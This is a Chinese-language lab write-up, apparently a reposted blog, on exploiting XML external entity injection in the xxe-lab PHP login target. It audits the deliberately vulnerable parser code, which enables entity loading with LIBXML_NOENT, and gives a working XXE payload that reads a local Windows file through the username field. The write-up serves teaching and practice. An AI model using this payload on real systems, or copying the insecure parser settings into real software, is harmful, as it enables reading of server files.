ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 其他分享> 文章详细

【xml外部实体注入】xxe-lab

2021-10-28 19:35:33  阅读:363  来源: 互联网

标签:xml username dom text lab result xxe msg


1、打开靶场地址/xxe-lab-master/php_xxe/

2、 抓包分析,用户名密码以POST提交,且形式类似xml

3、 审计源码

<?php
/**
* autor: c0ny1
* date: 2018-2-7
*/

$USERNAME = 'admin'; //账号
$PASSWORD = 'admin'; //密码
$result = null;

libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input'); //php://input可以访问请求的原始数据的只读流,这里是读取post提交的字符串序列

try{
	$dom = new DOMDocument(); //新建了一个xml对象
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); //将post数据转变成xml文档
	$creds = simplexml_import_dom($dom);  //实例化  在此处发生了漏洞的利用
 
	$username = $creds->username;  //取xml中的<username></username> 把漏洞利用得到的信息提取出来 
	$password = $creds->password;  //取xml中的<password></password>

	if($username == $USERNAME && $password == $PASSWORD){
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username); 
 //%d=1 %s=$username 这里1用来判断成功登录
	}else{
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username); 
 //%d=0 %s=$username 这里0用来判断登录失败
	}	
}catch(Exception $e){
	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}

header('Content-Type: text/html; charset=utf-8');
echo $result;
?>
  var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; 

  $.ajax({
        type: "POST",
        url: "doLogin.php",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        anysc: false,
        // 成功提交后会返回result
        success: function (result) {
        	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
        	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
        	if(code == "0"){ // 由上 0为登录失败
        		$(".msg").text(msg + " login fail!");
        	}else if(code == "1"){  //由上 1为登录成功
        		$(".msg").text(msg + " login success!");
        	}else{
        		$(".msg").text("error:" + msg);
        	}
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    });

注意:漏洞利用是在上述

    $dom = new DOMDocument(); //新建了一个xml对象
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); //将post数据转变成xml文档
    $creds = simplexml_import_dom($dom);  //实例化  在此处发生了漏洞的利用

处,后面的只不过是将漏洞得到的信息拿出来

4、利用

构造payload

<?xml version="1.0" ?>
<!DOCTYPE
a [
<!ENTITY b SYSTEM 'file:///c://windows/win.ini'>]
>
<aaa><username>&b;</username></aaa>

 

标签:xml,username,dom,text,lab,result,xxe,msg
来源: https://blog.csdn.net/kongzhian/article/details/121016845

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有